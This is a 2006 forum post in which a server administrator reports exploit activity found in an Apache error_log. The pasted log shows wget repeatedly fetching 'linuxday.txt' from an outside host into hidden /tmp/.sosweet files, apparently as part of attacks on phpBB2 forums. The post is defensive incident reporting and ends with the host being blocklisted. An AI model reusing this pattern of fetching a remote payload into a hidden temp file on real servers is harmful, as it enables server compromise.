It appears you have not registered with our community. To register please click here ...

Author Topic: linuxday.txt expliot in apache error_log  (Read 1163 times)

dynaweb

  • <b>Canine Deamon</b>
  • Administrator
  • Sr. Member
  • *****
  • Posts: 493
  • Karma: +10/-0
  • Generic personal text here ...
    • MSN Messenger - danno_d_manno@yahoo.com
    • View Profile
    • DynaWeb Designs
    • Email
linuxday.txt expliot in apache error_log
« on: January 17, 2006, 12:42:17 PM »
Looking through my /var/log/httpd/error_log I see a bunch of these:
 
Code: [Select]

--00:51:53-- http://www.lawison.com/[B]linuxday.txt[/B]
=> `/tmp/.sosweet\'
Resolving www.lawison.com... done.
Connecting to www.lawison.com[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,388 [text/plain]
0K ... 100% 1.62 MB/s
00:51:53 (1.62 MB/s) - `/tmp/.sosweet\' saved [3388/3388]
--00:53:17-- http://www.lawison.com/[B]linuxday.txt[/B]
=> `/tmp/.sosweet\'
Resolving www.lawison.com... done.
Connecting to www.lawison.com[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,388 [text/plain]
0K ... 100% 3.23 MB/s

 
Anyone else getting this in your logs? I openned the file http:// www. lawison.com/linuxday.txt in IE browser and it set off my anti-virus! I assume it is some sort of server exploit script. After searching, sure enough found these:
  • /tmp/.sosweet
  • /tmp/.sosweet1
  • /tmp/.sosweet2
I added lawison.com and 202.61.102.4 to the firewall blacklist, so maybe that will help.

=======================
Update: 08/18/06

Found this same thing on another server.  Coinsided with complaints of one user\'s PHPBB2 forum being unavailable at times recently.  It appears that this exploit is targeted towards PHPBB2 forums (suprised?).  Will add offending server to blocklist on all servers for preventative measures.
« Last Edit: February 25, 2006, 09:56:30 PM by dynaweb »
Those who cannot learn from history are doomed to repeat it. -- Linux learns.

 

Related Topics

  Subject / Started by Replies Last post
1 Replies
1973 Views
Last post August 16, 2005, 02:25:42 PM
by adb22791
1 Replies
2663 Views
Last post September 05, 2006, 12:11:09 PM
by ctwjr
0 Replies
204 Views
Last post November 21, 2005, 11:57:35 PM
by Linux News
0 Replies
191 Views
Last post December 16, 2005, 05:01:08 AM
by Linux News
0 Replies
1083 Views
Last post February 12, 2006, 12:10:17 PM
by dynaweb